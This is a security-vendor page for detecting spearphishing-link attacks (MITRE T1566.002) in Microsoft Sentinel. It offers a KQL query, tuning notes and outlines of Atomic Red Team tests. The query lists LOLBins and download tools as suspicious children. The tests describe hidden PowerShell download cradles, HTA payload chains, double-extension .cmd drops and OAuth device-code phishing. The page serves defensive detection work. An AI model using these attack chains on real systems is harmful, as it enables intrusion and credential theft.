Detect Spearphishing Link in Microsoft Sentinel
Adversaries may send spearphishing emails with a malicious link in an attempt to gain access to victim systems. Unlike spearphishing attachments, this variant embeds URLs in email body text, requiring the recipient to actively click or paste the link into a browser. Clicked links may deliver browser exploits, prompt downloads of malware or scripts, or harvest credentials via convincing login pages. Advanced variants include OAuth consent phishing (abusing OAuth 2.0 authorization flows to steal application access tokens), device code phishing (abusing OAuth 2.0 device authorization grant to obtain persistent tokens), and IDN homograph attacks where lookalike Unicode domains impersonate trusted brands. URLs may also be obfuscated via URL shorteners, integer-format IP addresses (e.g., hxxp://1157586937), or the @ symbol trick. Threat actors including Kimsuky, MuddyWater, BlackTech, LuminousMoth, DarkGate, and Squirrelwaffle have extensively leveraged this technique.
MITRE ATT&CK
- Tactic
- Initial Access
- Technique
- T1566 Phishing
- Sub-technique
- T1566.002 Spearphishing Link
- Canonical reference
- https://attack.mitre.org/techniques/T1566/002/
KQL Detection Query
let EmailClients = dynamic(["outlook.exe", "thunderbird.exe", "teams.exe", "msoutlook.exe"]);
let BrowserApps = dynamic(["msedge.exe", "chrome.exe", "firefox.exe", "iexplore.exe", "opera.exe", "brave.exe"]);
let SuspiciousChildren = dynamic(["powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe", "msiexec.exe", "certutil.exe", "bitsadmin.exe", "curl.exe", "wget.exe"]);
// Vector 1: Email client directly spawning a suspicious process (link opens registered protocol handler or triggers file download)
let EmailClientSpawn = DeviceProcessEvents
| where Timestamp > ago(24h)
| where InitiatingProcessFileName has_any (EmailClients)
| where FileName has_any (SuspiciousChildren)
| extend DetectionVector = "EmailClientDirectSpawn"
| extend RiskReason = strcat("Email client '", InitiatingProcessFileName, "' spawned '", FileName, "'");
// Vector 2: Browser spawning a suspicious process (drive-by exploit or redirect to malicious file association)
let BrowserSpawn = DeviceProcessEvents
| where Timestamp > ago(24h)
| where InitiatingProcessFileName has_any (BrowserApps)
| where FileName has_any (SuspiciousChildren)
// Exclude legitimate browser internal sub-processes
| where not(ProcessCommandLine has_any ("--type=renderer", "--type=utility", "--type=gpu-process", "--type=crashpad-handler", "--extension-process", "NativeMessagingHost"))
| where not(FileName =~ "msiexec.exe" and ProcessCommandLine has_any ("MicrosoftEdgeUpdate", "GoogleUpdate", "ChromeSetup", "EdgeUpdate"))
| extend DetectionVector = "BrowserSpawnedSuspiciousProcess"
| extend RiskReason = strcat("Browser '", InitiatingProcessFileName, "' spawned '", FileName, "'");
// Vector 3: MSHTA spawning additional processes (common in phishing link -> HTA -> payload chains)
let MshtaChain = DeviceProcessEvents
| where Timestamp > ago(24h)
| where InitiatingProcessFileName =~ "mshta.exe"
| where FileName has_any (SuspiciousChildren)
| extend DetectionVector = "MshtaSpawnedSuspiciousProcess"
| extend RiskReason = strcat("mshta.exe spawned '", FileName, "' — possible HTA payload chain");
union EmailClientSpawn, BrowserSpawn, MshtaChain
| project Timestamp, DeviceName, AccountName, FileName, ProcessCommandLine,
InitiatingProcessFileName, InitiatingProcessCommandLine,
DetectionVector, RiskReason
| sort by Timestamp descDetects suspicious process spawning chains consistent with a user clicking a malicious spearphishing link. Monitors three vectors: (1) email clients (Outlook, Thunderbird, Teams) directly spawning scripting interpreters or LOLBins, indicating a link triggered a protocol handler or download; (2) browsers (Edge, Chrome, Firefox) spawning suspicious child processes after navigating to a phishing page, consistent with drive-by exploitation or malicious file delivery; (3) mshta.exe spawning additional processes, the hallmark of a phishing link delivering an HTA file. Legitimate browser internal processes (renderer, utility, GPU worker, update handlers) are excluded. Uses DeviceProcessEvents from Microsoft Defender for Endpoint.
Data Sources
Required Tables
False Positives & Tuning
- Legitimate enterprise software installers triggered by browser downloads — Chrome or Edge spawning msiexec.exe for software self-updates (Google Update, Microsoft Edge Update) will fire unless update-specific strings are excluded
- Microsoft Teams or Outlook opening SharePoint/OneDrive links that trigger PowerShell-based document handlers or Office configuration scripts
- Browser-based remote management or virtual desktop tools (Citrix Workspace, VMware Horizon, AWS AppStream) that spawn helper processes via registered browser protocol handlers
- Security awareness training platforms (KnowBe4, Proofpoint Security Education) that simulate phishing link clicks and trigger benign download or redirect activity
- Developer tools and IDEs that open browser links which then chain to build scripts or test runners (VS Code Live Share, JetBrains IDE browser preview)
Other platforms for T1566.002
Testing Methodology
Validate this detection against 4 adversary techniques from Atomic Red Team. Each test below lists the behaviour to exercise and the telemetry you should expect to see. Executable commands and cleanup steps are available with Pro.
- Test 1Email Client Spawning PowerShell via Link Handler
Expected signal: Sysmon Event ID 1: Process Create — Image=powershell.exe, CommandLine contains '-WindowStyle Hidden' and 'Net.WebClient' and 'DownloadString'. Sysmon Event ID 3: Network connection attempt to 127.0.0.1:8080 (connection refused). Security Event ID 4688 if command line auditing is enabled. PowerShell ScriptBlock Log Event ID 4104 with full script content.
- Test 2Browser Spawning MSHTA via HTA File Download
Expected signal: Sysmon Event ID 1: Process Create — Image=mshta.exe, ParentImage=msedge.exe (or cmd.exe depending on Edge's open handler). Sysmon Event ID 11: File creation event for df00tech-test.hta in %TEMP%. Security Event ID 4688 for mshta.exe process creation with full command line including path to HTA file.
- Test 3OAuth Device Code Phishing Flow Initiation
Expected signal: Sysmon Event ID 1: Process Create — Image=powershell.exe, CommandLine contains 'devicecode' and 'login.microsoftonline.com'. Sysmon Event ID 3: Network connection to login.microsoftonline.com on port 443. Sysmon Event ID 22: DNS query for login.microsoftonline.com. Azure AD sign-in logs: device code flow request entry visible in non-interactive sign-in logs for the test client_id (04b07795 is the Azure CLI client ID, a well-known public client).
- Test 4Malicious Link Payload Drop Simulation
Expected signal: Sysmon Event ID 11: File creation in %TEMP% for Invoice_2026-03-12.pdf.cmd (double extension with .cmd as final extension). Sysmon Event ID 1: Process Create — Image=cmd.exe, CommandLine references the %TEMP% staged file path, ParentImage=powershell.exe. Security Event ID 4688 for both powershell.exe and cmd.exe. The temporal pattern of PowerShell network activity followed by file creation in staging dir followed by cmd.exe execution matches the hunting query for email client network + file drop correlation.
References (11)
- https://attack.mitre.org/techniques/T1566/002/
- https://us-cert.cisa.gov/ncas/tips/ST05-016
- https://www.mandiant.com/resources/blog/url-obfuscation-schema-abuse
- https://www.microsoft.com/security/blog/2021/07/14/microsoft-delivers-comprehensive-solution-to-battle-rise-in-consent-phishing-emails/
- https://www.secureworks.com/blog/oauths-device-code-flow-abused-in-phishing-attacks
- https://www.netskope.com/blog/new-phishing-attacks-exploiting-oauth-authorization-flows-part-1
- https://www.optiv.com/insights/source-zero/blog/microsoft-365-oauth-device-code-flow-and-phishing
- https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/safe-links-about
- https://learn.microsoft.com/en-us/defender-xdr/advanced-hunting-urlclickevents-table
- https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.002/T1566.002.md
- https://blog.trendmicro.com/trendlabs-security-intelligence/pawn-storm-abuses-open-authentication-advanced-social-engineering-attacks
Unlock Pro Content
Get the full detection package for T1566.002 including response playbook, investigation guide, and atomic red team tests.